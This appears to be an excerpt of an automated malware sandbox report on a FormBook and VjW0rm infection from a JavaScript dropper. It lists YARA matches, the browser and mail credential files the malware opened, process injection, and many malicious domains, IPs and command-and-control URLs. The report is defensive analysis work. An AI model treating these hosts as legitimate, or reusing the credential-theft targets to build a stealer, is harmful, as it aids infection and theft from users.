AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000002.00000003.703731399.0000015597A73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.703744618.0000015597A7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.959321094.0000015595506000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: wscript.exe, 00000007.00000002.962073296.0000019175BB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938835842.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773589121.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \MsMpeng.exe

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Yara detected VjW0rm
Source: Yara match File source: 00000002.00000002.959380851.0000015595548000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.964474352.000002A0FC393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.961147065.0000019173A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.964554613.000002CA0370B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.961594354.000001559722F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.512701190.000002A0FE195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.961930563.0000019175726000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.990991085.000002CA0506D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.972899634.000002A0FE18A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.964440619.000002A0FC389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.959396798.0000015595552000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.512633458.000002A0FE195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 7152, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 3576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6416, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Yara detected VjW0rm
Source: Yara match File source: 00000002.00000002.959380851.0000015595548000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.964474352.000002A0FC393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.961147065.0000019173A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.964554613.000002CA0370B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.961594354.000001559722F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.512701190.000002A0FE195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.961930563.0000019175726000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.990991085.000002CA0506D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.972899634.000002A0FE18A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.964440619.000002A0FC389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.959396798.0000015595552000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.512633458.000002A0FE195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 7152, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 3576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6416, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 635297 Sample: CIQ-PO16266.js Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 56 www.wps-mtb.com 2->56 58 www.spxtokensales.com 2->58 60 5 other IPs or domains 2->60 78 Snort IDS alert for network traffic 2->78 80 Multi AV Scanner detection for domain / URL 2->80 82 Found malware configuration 2->82 84 14 other signatures 2->84 11 wscript.exe 3 2->11         started        signatures3 process4 file5 52 C:\Users\user\AppData\Local\Temp\bin.exe, PE32 11->52 dropped 54 C:\Users\user\AppData\Roaming\wtheeNaAZG.js, ASCII 11->54 dropped 102 System process connects to network (likely due to code injection or exploit) 11->102 104 Benign windows process drops PE files 11->104 106 Drops script or batch files to the startup folder 11->106 108 2 other signatures 11->108 15 bin.exe 11->15         started        18 wscript.exe 2 13 11->18         started        signatures6 process7 dnsIp8 110 Antivirus detection for dropped file 15->110 112 Multi AV Scanner detection for dropped file 15->112 114 Machine Learning detection for dropped file 15->114 116 5 other signatures 15->116 22 explorer.exe 1 6 15->22 injected 62 dilshadkhan.duia.ro 91.193.75.133, 49736, 49740, 49742 DAVID_CRAIGGG Serbia 18->62 46 C:\Users\user\AppData\...\wtheeNaAZG.js, ASCII 18->46 dropped file9 signatures10 process11 dnsIp12 64 www.pdwfifi.com 185.53.179.171, 49911, 49912, 49913 TEAMINTERNET-ASDE Germany 22->64 66 sekolahkejepang.com 103.247.11.212, 49848, 80 RUMAHWEB-AS-IDRumahwebIndonesiaCVID Indonesia 22->66 68 20 other IPs or domains 22->68 48 C:\Users\user\AppData\...\oxx7nkdv4g8.exe, PE32 22->48 dropped 50 C:\Program Files (x86)\...\oxx7nkdv4g8.exe, PE32 22->50 dropped 88 System process connects to network (likely due to code injection or exploit) 22->88 90 Performs DNS queries to domains with low reputation 22->90 27 rundll32.exe 1 12 22->27         started        30 wscript.exe 12 22->30         started        33 wscript.exe 12 22->33         started        35 2 other processes 22->35 file13 signatures14 process15 dnsIp16 92 Tries to steal Mail credentials (via file / registry access) 27->92 94 Tries to harvest and steal browser information (history, passwords, etc) 27->94 96 Modifies the context of a thread in another process (thread injection) 27->96 100 2 other signatures 27->100 37 cmd.exe 2 27->37         started        40 cmd.exe 1 27->40         started        70 dilshadkhan.duia.ro 30->70 72 192.168.2.1 unknown unknown 30->72 98 System process connects to network (likely due to code injection or exploit) 30->98 74 dilshadkhan.duia.ro 33->74 76 dilshadkhan.duia.ro 35->76 signatures17 process18 signatures19 86 Tries to harvest and steal browser information (history, passwords, etc) 37->86 42 conhost.exe 37->42         started        44 conhost.exe 40->44         started        process20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
170.39.76.27
 www.jlbwaterdamagerepairseattle.com Reserved
139776 PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY true
160.153.136.3
 rasheedabossmoves.com United States
21501 GODADDY-AMSDE true
185.53.179.171
 www.pdwfifi.com Germany
61969 TEAMINTERNET-ASDE true
162.0.230.89
 www.topings33.com Canada
22612 NAMECHEAP-NETUS true
207.174.214.35
 halecamilla.site United States
394695 PUBLIC-DOMAIN-REGISTRYUS true
66.235.200.145
 muddybootslife.com United States
13335 CLOUDFLARENETUS true
23.231.99.207
 www.refreshertowels.com United States
62904 EONIX-COMMUNICATIONS-ASBLOCK-62904US true
52.17.85.125
 shop.freewebstore.org United States
16509 AMAZON-02US false
137.220.133.198
 www.ratebill.com Singapore
64050 BCPL-SGBGPNETGlobalASNSG true
185.134.245.113
 www.localbloom.online Norway
12996 DOMENESHOPOsloNorwayNO true
91.193.75.133
 dilshadkhan.duia.ro Serbia
209623 DAVID_CRAIGGG true
103.247.11.212
 sekolahkejepang.com Indonesia
58487 RUMAHWEB-AS-IDRumahwebIndonesiaCVID true
45.39.111.146
 www.68chengxinle.com United States
18779 EGIHOSTINGUS true
172.67.140.71
 www.medyumgalip.com United States
13335 CLOUDFLARENETUS true
35.241.47.216
 www.84866.xyz United States
15169 GOOGLEUS false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
www.ratebill.com 137.220.133.198 true
www.medyumgalip.com 172.67.140.71 true
rasheedabossmoves.com 160.153.136.3 true
dilshadkhan.duia.ro 91.193.75.133 true
sekolahkejepang.com 103.247.11.212 true
www.refreshertowels.com 23.231.99.207 true
www.topings33.com 162.0.230.89 true
www.localbloom.online 185.134.245.113 true
www.pdwfifi.com 185.53.179.171 true
shop.freewebstore.org 52.17.85.125 true
www.jlbwaterdamagerepairseattle.com 170.39.76.27 true
www.68chengxinle.com 45.39.111.146 true
www.84866.xyz 35.241.47.216 true
www.o7oiwlp.xyz 134.122.201.217 true
www.tentanguang.online 185.27.134.149 true
muddybootslife.com 66.235.200.145 true
halecamilla.site 207.174.214.35 true
www.wps-mtb.com unknown unknown
www.muddybootslife.com unknown unknown
www.spxtokensales.com unknown unknown
www.rasheedabossmoves.com unknown unknown
www.sekolahkejepang.com unknown unknown
www.halecamilla.site unknown unknown
www.brawlhallacodestore.com unknown unknown
www.hengyuejiguang.com unknown unknown
www.mysbaally.com unknown unknown
www.gafcbooster.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.ratebill.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.refreshertowels.com/np8s/?zVB=MO+mSdLLrNuwRQYoVJuGLv0I5Vniy3FD6QWfbcj4un1GXTVLdefusF8/o4IGo+fIW5Ou&4hM4=o4B0f true
  • Avira URL Cloud: safe
 unknown
http://www.refreshertowels.com/np8s/?zVB=MO+mSdLLrNuwRQYoVJuGLv0I5Vniy3FD6QWfbcj4un1GXTVLdefusF8/o4IGo+fIW5Ou&CTr8g=z48HVPSHfp true
  • Avira URL Cloud: safe
 unknown
http://www.ratebill.com/np8s/?4hM4=o4B0f&zVB=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkBjakU6FhLRf true
  • Avira URL Cloud: malware
 unknown
http://www.rasheedabossmoves.com/np8s/?4hM4=o4B0f&zVB=pvCvVC1srqMzTu3vjZ/Pi4S7puQ7WYlroZs2vwEH9SE4BkgUF4SEMyF7Qq3EYWraDKw9 true
  • Avira URL Cloud: malware
 unknown
http://www.topings33.com/np8s/?zVB=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMINrnM1Idbq&4hM4=o4B0f true
  • Avira URL Cloud: malware
 unknown
http://www.halecamilla.site/np8s/?zVB=/pe3of3KthlHX+AZdE40oBjh24oMUm2DhTWzf9+6lBsOaTWyqOSb4stDRDmzQmtt1180&4hM4=o4B0f true
  • Avira URL Cloud: safe
 unknown
http://www.medyumgalip.com/np8s/?zVB=vppS5AedQQffRlEeclZ7feN7VEirdPdpHk1lk+jbM2J+jzoAXquLk4CVs1G32f+Ix1mc&4hM4=o4B0f true
  • Avira URL Cloud: safe
 unknown
http://www.pdwfifi.com/np8s/?4hM4=o4B0f&zVB=xL/YlJAUY6uB/cHSlkc/r5VaZJ7uMa0kbAtysG6BLnWT6huomjvuhq3RLtT5uw3RUbD6 true
  • Avira URL Cloud: malware
 unknown
http://www.jlbwaterdamagerepairseattle.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.brawlhallacodestore.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
www.gafcbooster.com/np8s/ true
  • Avira URL Cloud: malware
 low
http://www.pdwfifi.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.jlbwaterdamagerepairseattle.com/np8s/?4hM4=o4B0f&zVB=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo1SUrSQk5nZl true
  • Avira URL Cloud: malware
 unknown
http://www.topings33.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.muddybootslife.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.brawlhallacodestore.com/np8s/?zVB=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgMzU3Pebjd8T&4hM4=o4B0f true
  • Avira URL Cloud: malware
 unknown